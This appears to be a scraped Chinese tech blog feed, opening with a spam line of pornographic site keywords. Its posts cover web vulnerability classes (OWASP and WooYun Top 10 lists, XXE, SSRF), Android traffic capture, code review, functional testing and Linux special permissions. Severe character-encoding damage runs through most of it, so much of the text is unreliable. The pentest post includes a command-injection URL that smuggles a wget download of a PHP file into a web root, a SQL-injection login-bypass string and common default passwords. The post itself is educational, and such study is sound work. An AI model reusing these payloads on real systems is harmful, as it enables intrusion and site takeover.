亚洲成av人片在线天堂无,亚洲精品中文字幕无乱码麻豆,亚洲黄色在线网站

渗透测试必知必�?x��)—Web漏洞

��其自然EVO — Thu, 11 Dec 2014 15:26:00 GMT

0x00前言

　　本文为对WEB漏洞研究�p�d��的开��，日后�?x��)针对这些漏�z�一一研究�Q�敬��h��?/div>

　　0x01 目录

　　0x00 前言

　　0x01 目录

　　0x02 OWASP TOP10 ��单介�l?/div>

　　0x03 乌云TOP 10 ��单介�l?/div>

　　0x04 非主��的WEB漏洞

　　0x02 OWASP TOP10 ��单介�l?/strong>

　　除了(ji��n)OWASP的TOP10�Q�W(xu��)eb安全漏洞�q�有很多很多�Q�在�?a target="_self" style="word-break: break-all; color: #202859; line-height: normal !important;">��试和加固系�l�时也不能老盯着TOP10�Q�实际上是TOP10中的那少数几�?/div>
　　直接�?013的：(x��)
　　A1: 注入�Q�包�?a target="_self" style="word-break: break-all; color: #202859; line-height: normal !important;">SQL注入、OS注入、LDAP注入。SQL注入最常见�Q�wooyun.org || http://packetstormsecurity.com 搜SQL注入有非常多的案例，�׃��现在自动化工具非常多�Q�通常都是扑ֈ�注入点后直接交给以sqlmap��Z��表的工具
　　命��o(h��)注入相对来说出现得较?y��u)��，形式可以是�?x��)
　　https://1XX.202.234.22/debug/list_logfile.php?action=restartservice&bash=;wget -O /Isc/third-party/httpd/htdocs/index_bak.php http://xxphp.txt;
　　也可以查看案例：(x��)极�\�׃��插�g安装shell命��o(h��)注入漏洞 �Q�未对用戯��入做��M��校验�Q�因此在web端ssh密码填写处输入一条命令`dropbear`便得��C��(ji��n)执行
　　直接搜烦(ch��)LDAP注入案例�Q�简单尝试下�q�没有找刎ͼ�关于LDAP注入的相关知识可以参考我整理的LDAP注入与防御解析。虽然没有搜到LDAP注入的案例，但是重要的LDAP信息泄露�q�是挺多的，截至目前�Q�乌云上搜关键词LDAP�?1条记录�?/div>
　　PHP对象注入�Q�偶然看到有PHP对象注入�q�种漏洞�Q�OWASP上对其的解释为：(x��)依赖于上下文的应用层漏洞�Q�可以让��d��者实施多�U�恶意攻击，如代码注入、SQL注入、�\径遍历及(qi��ng)拒绝服务。实现对象注入的条�g为：(x��)1) 应用�E�序必须有一个实现PHP��术�Ҏ(gu��)��(�?__wakeup�?__destruct)的类用于执行恶意��d��Q�或开始一�?POP chain"�Q?) ��d��中用到的�c�d��有漏�z�的unserialize()被调用时必须已被声明�Q�或者自动加载的对象必须被这些类支持。PHP对象注入的案例及(qi��ng)文章可以参考WordPress < 3.6.1 PHP 对象注入漏洞�?/div>
　　在查找资料时�Q�看��C��(ji��n)PHP 依赖注入�Q�原本以为是和安全相关的�Q�结果发玎ͼ�(x��)依赖注入是对于要求更易维护，更易��试�Q�更加模块化的代码的解决�Ҏ(gu��)��。果然不同的视角�Q�对同一个词的理解相差挺多的�?/div>
　　A2: 失效的��n份认证及(qi��ng)�?x��)话��理�Q�乍看��n份认证觉得是和输入密码有关的�Q�实际上�q�有�?x��)话id泄露�{�情况，注意力集中在口��o(h��)安全上：(x��)
　　案例1�Q�空口��o(h��)
　　乌云�Q�国内cisco�p�d��交换机空密码��d��大集�?/div>
　　乌云�Q�UC某服务器可空口��o(h��)讉K��数据�?/strong>
　　案例2�Q�弱口��o(h��)
　　乌云�Q�盛大某站后台存在简单弱口��o(h��)可登录　　admin/admin
　　乌云�Q�电(sh��)信某省客服系�l�弱口��o(h��)泄漏各种信息　.../123456
　　乌云�Q�中国徏�{�股份有限公司OA�pȝ��tomcat弱口令导致��陗��　tomcat/tomcat
　　案例3�Q�万能密�?/strong>
　　乌云�Q?a target="_self" style="word-break: break-all; color: #202859; line-height: normal !important;">�U�d����L(f��ng)��上户�pȝ��存在�q��o(h��)不严　　admin'OR'a'='a/admin'OR'a'='a (实际上仍属于SQL注入)
　　弱口令案例实在不一而��
　　在乌云一些弱口��o(h��)如下�Q�其中出镜次数最高的是：(x��)admin/admin, admin/123456

　如果要��l�深�I�下��L��者取得更多数据进行分析的话，�l�局��׃��(x��)如猪猪侠�ȝ��的那��P��(x��)
　　当然�?x��)话存在的安全问题也是需要考虑的，可以是��o(h��)牌、token被窃取，��其当会(x��)话没有设�|�生命周期时很容易出��C��(x��)�?�w�䆾被劫�?/a>
　　�?x��)话��理问题可以是用户A登陆�?ji��n)某个地址�Q�但是没有注销(奇葩情况是注销无效)�Q�直接退��Z��(ji��n)��览器又没有清除cookie�Q�如果说�q�时候有B借用A的电(sh��)脑，他直接以A的��n份登陆该地址是没有问题的�Q�这不是服务端的问题。但假设之后A都没有访问改地址�Q�而是把电(sh��)脑合上待��Z��(ji��n)�Q�第二天如果B借用他的�?sh��)脑直接登陆了(ji��n)该地址�Q�则责�Q在于服务端的�?x��)话��理不当�Q�没有设�|�超时时间。除此之外，�q�有�?x��)话重放、会(x��)话信息泄露等问题。说��C��(x��)话信息泄�Ԍ��不禁惌��v��sessionid攑֜�URL中的情�Ş�Q�鄙人暂未遇到直接利用这个可以窃取会(x��)话的�Q�但不排除其可能
　　A3: 跨站脚本(XSS)�Q�最普遍的漏�z�，曾被认�ؓ(f��)是鸡肋漏�z�，事实证明有时候危宛_��大的�Q�窃取cookie�Q�构造蠕虫不一而��。XSS的技术体现在Javascript功底上，现在很多�|�站都有针对XSS的过滤器�Q�J2EE可以使用全局�q��o(h��)器，但是�q��o(h��)器基本都是��用黑名单��N��Q�是有可能绕�q�的�Q�回应了(ji��n)技术体现在Javascript功底上。跨站脚本还有flash�c�d��的，�׃��相比之下出现得比较少�Q�浏览器和过滤器的防御精力不在这上面�Q�如果出现可能更�Ҏ(gu��)��成功。值得一提的是，对于XSS�Q�现在的扫描工具都会(x��)��其标识为高危漏�z�，实际上扫描器�Ҏ(gu��)��q�回的响应中是否有加入的载荷来判断跨站脚本漏�z�存在的可能性，误报率会(x��)比较高。还有就是常规扫描器只能识别反射型XSS�Q�反��型XSS本��n危害是比较小的，存储型XSS危害才大(危害大小看具体情�?。反��型XSS现在常规payload要想�q�IE10、IE11或chrome�q�是有难度的�Q�因此XSS技术的另一个体现方面即是对��览器特性的�?ji��n)解。至于存储型XSS�Q�则要看具体业务和数据是否会(x��)受媄(ji��ng)响，用户交互�E�度��高�Q�利用难度就��大�Q�如果能�Ҏ(gu��)��证实漏洞存在�Q�但很难被触发或者就��窃取到cookie也无法登陆，很难说明是高风险安全问题�Q�但�q�是有修复和改进的必要�?/a>
　　A4: 不安全的直接对象引用�Q�访问控制不当的问题�Q�常见�ؓ(f��)��权操作(横向+�U�向)�Q�譬如：(x��)遍历用户id扚w��获取用户信息、在HTTP��h��中篡�Ҏ(gu��)��个参数的值就变成�?ji��n)其他��n份进行的操作�Q�最�Ȁ动�h�?j��)的是可以进行刷��q��操作。越权问题�ƈ不高深，相比SQL注入和XSS技术难度还要低一点，因�ؓ(f��)通常只要改参数值就可以�?一般来�?。防止此�c�问题的做法很简单，当用户需要访问某资源或进行操作时�Q�服务器端取出来访用��L(f��ng)��session��|��判断是否��h��讉K��或操作权限�?/a>
　　在访问控制操作中�Q�我们可以设定某一资源或文件A可以讉K��、B不能讉K��Q�但是当对应的用户多��h��时也�?x��)遇到麻烦(ch��)。也可以为用戯��问资源或文�g标志一个权限，作�ؓ(f��)一个会(x��)话属性，属于自己的才可以操作或访问，具体情况具体讨论�?/a>
　　案例1�Q�水�q��?/strong>
　　乌云�Q�虎扑某功能存在水��^��权
　　案例2�Q?垂直��权
　　乌云�Q�中国电(sh��)信某�pȝ��理员WEB界面��权讉K��
　　A5-A7\A9: 安全配置错误\敏感数据泄露\功能�U�访问控制缺失\使用含已知漏�z�的�l��g=>�q�维不当�Q�直接看�q�维不当�?/a>
　　知乎专栏�Q�运�l�安�?...)
　　乌云知识库：(x��)从乌云看�q�维安全那点事儿
　　引用一下知识库的内容，问题有：(x��)
　　struts漏洞
　　Web服务器未�?qi��ng)时打补丁，有解析漏�z?/a>
　　PHP-CGI RCE
　　FCK�~�辑�?/a>
　　server-status信息泄露
　　�|�站备䆾文�g攑֜�web目录�Q�可被下�?/a>
　　列目录导致可看到敏感数据�q�查�?/a>
　　snmp信息泄露
　　weblogic弱口�?/a>
　　SVN信息泄露
　　域传送漏�z?/a>
　　Rsync
　　hadoop对外
　　nagios信息泄露
　　ftp弱口令或支持匿名讉K��D��信息泄露
　　RTX泄露信息
　　Ganglia信息泄露
　　j2ee应用架构开始占��L��Q�典型的web服务器搭配配�|�失�?/a>
　　Jenkins�q�_��没有讄��d��验证
　　zabbix
　　zenoss监控�pȝ��
　　Resin文�g��d��
　　memcache未限制访问IP
　　JBoss问题
　　��试服务器外�|�可讉K��
　　padding oracle attack
　　用户名密码放在服务器�?#8230;…
　　A8: 跨站��h��伪�?CSRF)
　　CSRF曾被�U�Cؓ(f��)沉睡的巨人，以前拿来举例旉��是说Alice�l�Bob转钱�Q�结果morry插了(ji��n)一脚，钱就跑到morry家去�?ji��n)。危宛_��大可��，直接通过URL增删�Ҏ(gu��)��作的也还有，更多的还是基于表单。如果是XSS+CSRF =>蠕虫 ��比较可观了(ji��n)�Q�也曄��到过直接get root的案�?br />
案例�Q�万辄��(sh��)�׃��?xss + csrf
　　A10: 无效的重定向
　　控制重定向可以钓��|��可以获取敏感文�g的信息，在struts2中也有开��N��定向的命令执�?/div>
　　0x03 乌云TOP 10 ��单介�l?/strong>
　　上述��是OWASP TOP10的WEB漏洞�Q�乌云出�?ji��n)一个更加符合中国国情的乌云�Q�Top10 for 2014�Q�看着也是触目惊心(j��)
　　A1-互联�|�泄密事�?撞库��d��
　　本质上来说是使用�?ji��n)不安全的口令，也许我可以将自己的密码设�|�的很复杂，别�h破解不出来。但对于撞库��d��而言�Q�可以说是不怕神一��L(f��ng)��Ҏ(gu��)��Q�就怕猪一��L(f��ng)��队友。我们注册��用的�|�站或服务商他们保存�?ji��n)我们��用的密码�Q�而很多时候被泄露出去�?ji��n)我们�ƈ不知道。这也是考验我们密码�?f��n)惯的时候了(ji��n)�Q�强密码+不同的密码，当然密码多了(ji��n)也难以记住，不行��借助软�g或者普通�̎��L(f��ng)��同一个密码，重要账号用不同密码吧
　　A2-引用不安全的�W�三方应�?/div>
　　丄��例子是heart bleed漏洞使用的openssl�Q�另外struts2的漏�z�也�q�数见不鲜，其次��是CMS如wordpress使用的插�?当然shellshock也会(x��)有很多中枪的
　　A3-�pȝ��错误/逻辑�~�陷带来的暴力猜�?/div>
　　暴力破解�Q�没对请求和错误�ơ数做限�Ӟ��重放��d��同样是没做检验或限制
　　A4-敏感信息/配置信息泄露
　　包括但不限于目录遍历、日志、配�|�文件、svn目录、github或其他博客等地方
　　A5-应用错误配置/默认配置
　　包括但不限于默认路径、默认口令、目录穿��、�Q意文件下载等
　　A6-SQL注入漏洞
　　A7-XSS跨站脚本��d��/CSRF
　　A8-未授权访�?权限�l�过
　　可匿名访问\判断referer值后免登�?/div>
　　A9-账户体系控制不严/��权操作
　　A10-内部重要资料/文档外泄
　　�q�是信息泄露�Q�但是做�?ji��n)区分，不同于应用或服务器的信息泄露�Q�专指内部信息泄露哟
　　0x04 非主��的WEB漏洞
　　实际上，如果要挖漏洞或者做��试�Q�从乌云上找案例�?x��)比较方便，除�?ji��n)常见的几�c�M��码层面的问题�Q�更多的是配�|�不当方面的�Q�最�l�归�l�到信息安全链上最脆弱的还是�h本��n
　　除了(ji��n)上面提到的这些，其实�q�有很多的漏�z�啊�Q�跟讑֤�有关�pȝ��先不说�?ji��n)，再提一下两个看��h��不错的：(x��)XXE、SSRF(or XSPA)
　　XXE�Q�XML外部实体注入�Q�不仅仅是敏感信息泄�Ԍ��腾讯安全中心(j��)�Q�XXE漏洞攻防
　　案例�Q?/div>
　　1. 乌云�Q�百度某功能XML实体注入
　　2. 乌云�Q?39邮箱XXE漏洞可读取文�?/div>
　　3. 乌云�Q�从开源中国的某XXE漏洞��C��站shell
　　SSRF(服务端请求伪�?: 据说用这招可以成功多�ơ进入阿里、腾讯、百度等的内�|�，没爆出来的估计很多被用作杀器了(ji��n)
　　案例�Q?/div>
　　1. 乌云�Q�百度脓(chu��ng)吧SSRF
　　2. 乌云�Q�新��SSRF
　　3. 乌云�Q�阿里巴巴SSRF
　　上面几个案例有的是分享功能，有的是其他功能，共同点在于都是跟的url参数�Q�且没做限制�Q�导致内�|�信息泄�?/div>
　　�Q�未�?..�Q?/div>

English »

Options : History : Help : Feedback
Text-to-speech function is limited to 100 characters

��其自然EVO 2014-12-11 23:26 发表评论

Android客户端捕获http��h��包的�Ҏ(gu��)��

��其自然EVO — Wed, 30 Jan 2013 05:02:00 GMT

对于Web��试�Q�我们可以很�Ҏ(gu��)��的抓取到相关的http��h��包，不用什么专业��Y�Ӟ��甚至��览器都能帮我们完成�q�个功能�Q�拿到需要的http��h��q�接 �?/p>
　　http�q�接对于��试同学来说�Q?不论做功能、性能或是安全�Q�都是非帔R��要的�Q?他过滤了(ji��n)前台的因素，让测试同学直接能对后台进行交互�?/p>
　　以上是http�q�接的重要性，基本�{�于废话�Q�下面是正题�?/p>
　　客户�?a href="" target="_self" style="word-break: break-all; color: #202859; text-decoration: initial; line-height: normal !important;">安全��试�Q�同样需要拿到http的请求包�Q�由于客��L(f��ng)��的前�D�限制绕�q�比较麻�?ch��)，那么在做安全��试的过�E�中�Q�直接拿到http的请求包昑־�更外重要�?/p>
　　有如下方法可以拿到请求的http包：(x��)
　　1、在不配�|�代理的情况下，�?a href="" target="_self" style="word-break: break-all; color: #202859; text-decoration: initial; line-height: normal !important;">Android客户端（模拟器）(j��)的数据我们可以��用wireshark或者etherpeek�{�网�l�层抓包软�g抓取�Q�模拟器本��n的数据交互是通过�?sh��)脑��L��的网卡进行的�Q�所以我们通过抓包软�g抓取��L��|�卡的数据包�Q�经�q�过滤，便可得到模拟器客��L(f��ng)��中的数据包，�c�M��q�样�Q?/p>
　　讉K��之后�Q�通过wireshark�q��o(h��)http��h��Q�便可找到我们刚刚发送的��h��?/p>
　　当然�Q�这是种比较�ȝ��(ch��)的方法，不过可以更确切的看到�|�络包发送的内容�?/p>
　　另一�U�办法是�Ҏ(gu��)��拟器配置代理�Q�让所有请求包可以通过外部��L��的七层抓包��Y�Ӟ��例如fiddler �Q�burpsuite�{�所捕获刎ͼ�配置代理需要先做一�ơ设�|�：(x��)�c�M��q�样�Q?/p>

　　�q?�?#8220;讄��”选项之后�Q�按照图�C��|?/p>
　　�q�里proxy 讄��?0.0.2.2是android模拟器对外部��L��地址的硬�~�码�Q�端口设�?888是外部主机fiddler 的监听地址�Q�当�?d��ng)��如果是burpsuite 可以讄��?080�?/p>
　　那么�q�样的话 �Q�我们就能通过fiddler抓取模拟器中的数据包�?ji��n)�?�q�样�Ҏ(gu��)��试来�Ԍ��可以用web端的应用层工具对客户端的http数据�q�行处理�Q�方便的可就多了(ji��n)�?/p>

��其自然EVO 2013-01-30 13:02 发表评论

自动化构建方面的知识

��其自然EVO — Wed, 27 Jun 2012 02:01:00 GMT

http://www.cnblogs.com/itech/archive/2011/07/25/2116447.html

��其自然EVO 2012-06-27 10:01 发表评论

��其自然EVO — Thu, 03 May 2012 02:05:00 GMT

　��试人员参与代码��(g��)视的收益�Q?/strong>
　　a�Q�测试�h员可以在早期��p��够熟知系�l�，提前发现代码中的BUG�Q?/p>
　　b�Q�提�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">��试工程�?/strong>阅读代码和写代码能力�Q?/p>
　　c�Q�测试工�E�师的经验积累后�Q�可以避免一些很常见�Q�很普通低�U�的错误�Q?/p>
　　d�Q�测试取得话语权�Q�促(j��)�q�开发与��试的更多��^�{�沟通；
　　e�Q�对于开发新员工的代码，收益�?x��)加倍（新员工容易犯业务上的低��错误�Q��?/p>
　　�W�零步：(x��)�Q�比如新参与某系�l�的��试�Q?/strong>
　　a�Q?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">学习(f��n)业务知识�Q?/p>
　　b�Q�学�?f��n)系�l�整体架构；
　　c�Q�开发同学讲解设计架构、代码结构；
　　d�Q�熟�(zh��n)��用系�l�，扑ֈ�阅读代码下手点：(x��)�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">日志、业务入口、SqlMap�{�；
　　e�Q�从��程或者数据流阅读下去�Q�然后一步步深入��C��码中�?/p>
　　�W�一步：(x��)�Q�code review准备�Q?/strong>
　　a�Q�当需求已�l�确定，��试同学需要参与方案的讨论�Q?/p>
　　b�Q�开发开始编写代码，��试�q�行��试用例设计�Q?/p>
　　c�Q�当开发某个类或者功能或者方法已�l�基本稳定，让开发串讲实现方式（避免出现实现方式不合理）(j��)�Q?/p>
　　d�Q�测试同学可以开始review开发的代码�Q�同时补充或者去重复��试用例�Q�story或者sdv��试用例�Q��?/p>
　　�W�二步：(x��)�Q�code review�q�行�Q?/strong>
　　a�Q�对代码的规范进行检视；
　　b�Q�对代码的可��试性进行检视；
　　c�Q�从业务场景的角度去review代码�Q�如果实现存在的问题�Q�那基本上可以发玎ͼ�
　　d�Q�对于发现的问题�Q�徏议分时段�l�开发，否则�?x��)打乱开发的写代码节奏；
　　e�Q�如果你�q�不懂设计、不懂架构，那么可以从是否浪费CPU、是否浪费内存的角度看代码�?/p>
　　�W�三步：(x��)�Q�code review后）(j��)
　　a�Q��{��试后，应该不出现实现方案不合理的情况；
　　b�Q�有�l�果�l�计�Q�这个�P代review的记录数�Q�可以横向比较；
　　c�Q��P代�ȝ��Q�开发与��试一赯��行经验教训分享�?/p>

��其自然EVO 2012-05-03 10:05 发表评论

为功能测试正名，写给�q�大软�g��试同行

��其自然EVO — Thu, 03 May 2012 02:04:00 GMT

　首先�Q�恭��?1testing生日快乐�Q�感谢�?zh��n)�一直是所�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">软�g��试人员成长的摇��和�_��支柱�Q?/p>
　　从刚刚接触��Y件测�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">工作�Q�到现在已经有十�q�之久�?/p>
　　十年前，毕业后就�q�入�?ji��n)一家��Y件公司，�l�理分配的�Q务就是测试��Y�Ӟ��发现有错的地方就告诉他。这是我对��Y件测试工作的�W�一印象�Q�就是看�pȝ��是否报错�Q�各个功能按钮是否能够正��响应�?/p>
　　两年后，�׃��公司�l�营不善�Q�我被公司裁员。其理由是：(x��)技术�ȝ��认�ؓ(f��)没有必要讄��软�g��试工程师的岗位。因此，竞岗�Ӟ��我无岗可竟�?/p>
　　恰��y�Q�当时中国��Y件评��中�?j��)跟省科技厅联合培训，于是�Q�我��q��一�ơ真正认识到什么是软�g��试。同�Ӟ��也知道了(ji��n)51testing和测试时代这些��Y件测试交��的专业�q�_��?/p>
　　之后�Q�我��入职另一家��Y件公司。当�Ӟ��入职的职务是��试员，但公司的��试基本上和我第一�ơ接触��Y件测试工作时的水�q�_��不多。于是，我就从最基础�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">�~�陷��理�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">��试用例、测试流�E�、测试规范、测试标准等�{�，一步步的将公司的测试规范徏立�v来，而我也因此成��Z��(ji��n)公司的测试部门经理。从��试员到��试部门�l�理�Q�在�q�短短的八个月的旉��里，可以说我取得的每一�ơ进步，掌握的每一�U�知识，均来源于51testing和QQ��。可以说�Q�如果没有这些交��^収ͼ��׃��可能有系�l�化学习(f��n)的机�?x��)�?/p>
　　��Z��(ji��n)挑战质量要求更高的项目，我离开�?ji��n)家乡，加入了(ji��n)现在的团队。这是一支由150多名技术�h员组成的团队�Q�其中，��试人员�?0人。我入职的职务是��试�l�长�Q�两周后任质量经理，八个月后��L��试�ȝ��。从各种��试标准的制定到��试规范的徏立，再到��试体系的徏立；从团队战略发展方向到团队梯队��再到��试知识库的�{�徏�Q�从技术培训到团队成员职业规划�Q�三�q�来 �Q�我和这支团队一��h��ѝ�?/p>
　　从业�q�十�q�_(d��)��参与的项目十余个�Q�其中千万��以上的项目三个。项目涉�?qi��ng)MIS、HIS、GIS、OA、三�l�应用、BI、SOA、应用系�l�集成等诸多方向�Q�其��试�c�d��包括�Q?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">功能��试�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">性能��试、接口测试�?/p>
　　说了(ji��n)�q�么多，大家一定以为我写跑题了(ji��n)�Q�其实不然。之所以描�q�自��q��成长�l�历�Q�是惛_��诉大家我的体�?x��)来源于我的�l�历�?/p>
　　无论是在各种��试论坛上，各个��试QQ��中�Q�还是在招聘时的应聘人员。我�l�常�?x��)遇到这�U�问题，�怿�大多数同行们也都遇到�q��?/p>
　　1、做功能��试有前途么�Q?br style="word-break: break-all; line-height: normal !important; " />　　2、做黑盒��试有前途么�Q?br style="word-break: break-all; line-height: normal !important; " />　　3、我现在只能做功能测试，但我今后一定要�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">自动化测�?/strong>、性能��试�Q?br style="word-break: break-all; line-height: normal !important; " />　　4、你们公�怸�自动化了(ji��n)么？
　　5、我�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">QTP、LR�?/p>
　　�q�大��试同行在投��历时�Q�也一定常见这�U�职位要求：(x��)要求熟练掌握LR、QTP、QC、TD、Bugzilla�{�工具之一�?/p>
　　�׃��先说说后面这�U�情��c(di��n)��一个公司在选择��试人员�Ӟ��竟然��这些测试工具作为选�h标准之一。我想问�q�样招聘的公司几个问题：(x��)
　　1、贵公司的��品适合上自动化么？
　　2、贵公司的管理水�q��C��自动化的要求�?ji��n)么�Q?br style="word-break: break-all; line-height: normal !important; " />　　3、LR能完全支撑贵公司产品的性能��试么？
　　4、贵公司一�q�能有多��项目需要做性能��试�Q?br style="word-break: break-all; line-height: normal !important; " />　　5、缺��L(f��ng)��理工��h��个公司用的都不太一��P��其缺��L(f��ng)��理流�E�是需要结合公司管理流�E�的�Q�这�U�工具即便�h家不�?x��)或没用�q�此�c�d��P��你就不能培训么？很难么？
　　除非公司是在招聘对口的技术�h才，否则�Q�我只能认�ؓ(f��)�q�家公司的测试水�q�真的不咋的。甚至于写招聘要求的人，压根��׃��懂测试�?/p>
　　�׃��再来说说关于同行们对功能��试的误解。好多�h都认为功能测试门槛低�Q�没技术含量，好像提�v来做功能��试��׃��Z��{�似得。如果你有这�U�意识，我只能说�Q�兄弟，多干几年吧。我承认功能��试的入门门槛是低，但我不认为功能测试没技术含量。我甚至认�ؓ(f��)一个能把功能测试做好的��试人员�Q�才是一个合格的质量负责人！
　　大家先别拍我�Q�让我们来谈一下什么是软�g��试。既然大安��是同行，�怿�大家都认同：(x��)“通过��试手段�Q�在用户使用前，发现�~�陷�?#8221;以及(qi��ng)“软�g中不可能没有�~�陷�?#8221;�q�两句话。不错，��试是不能被�I��D的，因此�Q�我们也不可能发现��Y件中所有的�~�陷。因此，我们是不是能够换句话��_(d��)��(x��)“软�g��试是通过一�p�d��的测试手�D�，证明软�g具备一定的质量�?#8221;
　　如果你认同这一观点�Q�那么我们再来谈谈功能测试的范围�?/p>
　　狭义的功能测试：(x��)�q�点点，那点点，看看能不能正��打开��面、程序会(x��)不会(x��)崩溃、功能是不是能够正确实现�{�等。这也就是大家之所以认为功能测试没技术含量的�Ҏ(gu��)��原因。因��U�测试也得叫它功能测试�?/p>
　　�q�义的功能测试：(x��)各种业务逻辑是否已正��实玎ͼ�各种业务�U�束是否正确实现�Q�各�cȝ��D�的数据是否能够正确处理�Q��Y件的定w��机制如何�Q�数据的完整性、唯一性、正��性是否已�l�通过��试�Q�系�l�及(qi��ng)数据的安全性是否已通过��试�Q��Y件的易用性是否满��用��L(f��ng)��需要？�{�等�{�等。功能测试所包含的范围实在是太大�?/p>
　　我没有贬低其他测试专业的意思，但有几点是需要说明的。随着各行各业对信息化��的需求日益提高，其��Y件的规模和复杂度正在��d��的提高。而功能测试的隑ֺ�也随软�g的复杂度逐日提高。而相�Ҏ(gu��)��_(d��)��白盒��试依旧��x��的是单个函数的代码逻辑以及(qi��ng)异常的处理；自动化测试仅仅提高的是测试执行效率，��试质量依然是要靠功能测试用例来保障�Q�性能��试其实��x��的是业务发生的场景和如何生成负蝲和收集监控指标，其变化就是需要监控的对象更多�Q�媄(ji��ng)响因素更为复杂�?/p>
　　面对规模庞大�Q�业务逻辑愈来愈复杂的�pȝ��Q�保障其软�g质量�Q�就需要广大功能测试�h员具备更强的逻辑分析、设计能力；掌握更多的业务知识及(qi��ng)技术。同�Ӟ��׃��当前国内�l�大多数企业�Ҏ(gu��)��试工作的认知�E�度不��Q�大多数��试工作都是在时间紧、�Q务重的条件下完成的。那么，在有限的条�g下，如何能够提高软�g产品的质量，卻I��(x��)如何证明软�g具备�?ji��n)一定的质量。将是所有��Y件质量负责�h首先考虑的问题�?/p>
　　在这�U�前提下�Q�我认�ؓ(f��)�Q�一个好的功能测试工�E�师应具备丰富的行业知识�Q�专家��Q�，极强的逻辑分析能力�Q�精于业务架构、测试架构�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">数据�?/strong>、测试用例的设计。公司的产品质量�Q�取决于��试负责人的�l�织能力�?qi��ng)团队成员的技术能力，因此�Q�功能测试工�E�师在测试团队中不可或缺�?/p>
　　无论是白盒测试、自动化��试、性能��试�Q�都是不同的��试手段�Q�但功能��试却是产品质量的根本保障！请广大正在从事功能测试的同行们，正视自己的工作，认真对待�Q�不要气馁或轻视自己的工作。将自己手头上的事做好，人生的每一�D늻�历都��是你的财富�Q?/p>

��其自然EVO 2012-05-03 10:04 发表评论

Linux下的高��权限文�g控制

��其自然EVO — Thu, 24 Nov 2011 08:47:00 GMT

　　在企业内�|�的开发环境方面，文�g服务器是一个非帔R��要的环节。其中，Samba服务器由于其权限控制的高度灵�z�L��，最�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">学习(f��n)时确实会(x��)让大家感到很�q�h��Q�但我们可以先搭��Z��些简单的案例来掌握其语法。本节主要是介绍Linux下的高��权限suid、sgid、sticky三种权限的特炏V�?/p>
　　很多人都很奇怪，��Z��么我们需要学�?f��n)这三种权限呢？因��?f��)在实�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">工作中我们发玎ͼ�如果不了(ji��n)解这些特�D�权限会(x��)让我们对Linux权限的理解（��其是加上Samba权限后）(j��)��ؓ(f��)困难�Q�所以我们必��要学习(f��n)�q�了(ji��n)解它们。下面试囄��显的讲解，让大家能充分理解�q�三�U�权限的作用。理解了(ji��n)它们�Q�再理解Samba的权限控制就更容易了(ji��n)�?/p>
　　注意　Samba的权限由两方面构成：(x��)
　　一是目录本�w�的权限�Q�二是Samba的配�|�权限。最�l�权限的定义是两者的最��交集�?/p>
　　我们接着来理解这3�U�权限：(x��)
　　1�Q�一个文仉��有一个所有者，表示该文件是谁创建的�?/p>
　　2�Q�如果同时该文�g�q�有一个组�~�号�Q�则表示该文件所属的�l�一般�ؓ(f��)文�g所有者所属的�l��?/p>
　　3�Q�如果是一个可执行文�g�Q�那么在执行�Ӟ��一般该文�g只拥有调用该文�g的用��h��h��的权限�?/p>
　　权限标志通过以下3�?#8220;�?#8221;来定义�?/p>
　　setuid�Q�设�|��文�g在执行阶�D�具有文件所有者的权限。比�?usr/bin/passwd�Q�如果是一般用��h��行该文�g�Q�则在执行过�E�中�Q�用户通过该文件可以获得root权限�Q�从而可以更改用��L(f��ng)��密码�?/p>
　　setgid�Q�该权限只对目录有效。目录被讄��该权限后�Q��Q何用户在此目录下创徏的文仉��h��和该目录所属的�l�相同的�l��?/p>
　　sticky�Q�该位可以理解�ؓ(f��)防删除位。一个文件是否可以被某用户删除，主要取决于该文�g所属的�l�是否对该用户具有写权限。如果没有写权限�Q�则�q�个目录下的所有文仉��不能被删除，同时也不能添加新的文件。如果希望用戯��够添加文件但同时又不删除文�g�Q�则可以�Ҏ(gu��)��件��用sticky bit位。设�|�该位后�Q�就��用户对目录��h��写权限也不能删除该文件�?/p>
　　下面介绍一下三�U�权限的特点�?/p>
　　�Q?�Q�sticky的特�?/strong>
　　sticky只能应用在目录上�Q��ƈ且是应用�?a href="" target="_self" style="word-break: break-all; text-decoration: none; line-height: normal !important; ">其他人的目录上�?/p>
　　只有root和文件的拥有者才能删除该文�g�?/p>
　　��写s表示能执行，大写S表示不能执行�?/p>
　　它的其他特点大家可以参�?tmp目录�?/p>
　　�Q?�Q�setuid的特�?/strong>
　　setuid只能应用在二�q�制文�g中�?/p>
　　当一个文件应用了(ji��n)setuid�Q�那么�Q何�h在执行该命��o(h��)的时候就能��(f��)时拥有该文�g拥有人的权限�?/p>
　　setuid只能应用在文件的拥有者上�?/p>
　　��写s表示能执行，大写表示S不能执行�?/p>
　　它的其他特点大家可以参�?usr/bin/passwd目录�?/p>

��其自然EVO 2011-11-24 16:47 发表评论

��其自然EVO — Tue, 08 Nov 2011 07:39:00 GMT

　如果�(zh��n)�很�Ҏ(gu��)��?nbsp;shell 提示行变得色彩绚烂且带有更多信息�Q��ؓ(f��)什么还要坚持用�?ch��)�h的标准提�C��呢？在这��技巧中�Q�Daniel Robbins ��说明如何获得符合�?zh��n)�的意愿�?shell 提示行，�q�会(x��)说明如何动态更�?xterm 的标题栏�?/p>
　　作�ؓ(f��) Linux/UNIX 人，我们有很长的旉��是在 shell �?a target="_self" style="word-break: break-all; color: #333333; text-decoration: none; line-height: normal !important; ">工作�Q��ƈ且在许多情况下，下面�q�一行就是始�l�盯着我们的那个提�C��Q?/p>
　　bash-2.04$
　　如果�(zh��n)�恰巧是��用户 (root)�Q��?zh��n)��有权��用下面这个美丽的标�?#8220;�w�䆾”的提�C��版本�Q?/p>
